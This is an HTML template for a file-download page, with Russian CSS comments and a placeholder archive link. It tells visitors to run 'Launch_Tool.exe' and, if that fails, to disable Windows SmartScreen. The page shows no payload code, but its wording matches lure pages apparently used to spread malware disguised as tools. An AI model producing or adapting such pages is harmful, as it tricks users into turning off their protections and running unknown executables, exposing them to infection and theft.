<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download File</title>
    <style>
        body {
            font-family: sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            min-height: 100vh;
            margin: 0;
            background-color: #000000; /* Добавили чёрный фон */
            color: #ffffff; /* Изменили текст на белый */
        }

        button {
            background-color: #4CAF50;
            border: none;
            color: white;
            padding: 20px 40px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 24px; /* Увеличили шрифт */
            border-radius: 10px;
            cursor: pointer;
            box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.2);
            margin-bottom: 20px; /* Отступ снизу кнопки */
            text-shadow: 0 0 10px #4CAF50; /* Неон свечение текста */
            outline: 4px solid #4CAF50; /* Неон свечение рамки */
            outline-offset: -6px; /* Смещение рамки для эффекта */
        }

        button:hover {
            background-color: #3e8e41;
            outline: 4px solid #3e8e41; /* Цвет рамки при наведении */
            text-shadow: 0 0 15px #3e8e41; /* Цвет свечения при наведении */
        }

        .info {
            text-align: center;
            margin-top: 20px; /* Отступ сверху */
        }

        .info h2 {
            margin-bottom: 10px; /* Отступ снизу заголовка */
        }

        .info ol {
            margin-top: 0; /* Убрали отступы сверху списка */
        }
    </style>
</head>
<body>
    <h1>Download File</h1>
    <p>Click the button to download the file.</p>
    <a href="your_file.zip" download="your_file.zip">
        <button>Download</button>
    </a>

    <div class="info">
        <h2>Instructions:</h2>
        <ol>
            <li>Download the archive from the website and extract it to a convenient folder.</li>
            <li>Run the auto-installer Launch_Tool.exe. It will install and download all necessary packages for operation.</li>
        </ol>

        <h2>Info:</h2>
        <p><b>Information:</b></p>
        <p>If you can’t install the program, you need to:</p>
        <ul>
            <li>Try to copy the link and paste into another browser.</li>
            <li>Disable Windows Smart Screen, as well as update the Visual C++ package.</li>
            <li>Install WinRar on your computer.</li>
        </ul>

        <p><b>Status: Working!</b></p>
    </div>
</body>
</html>
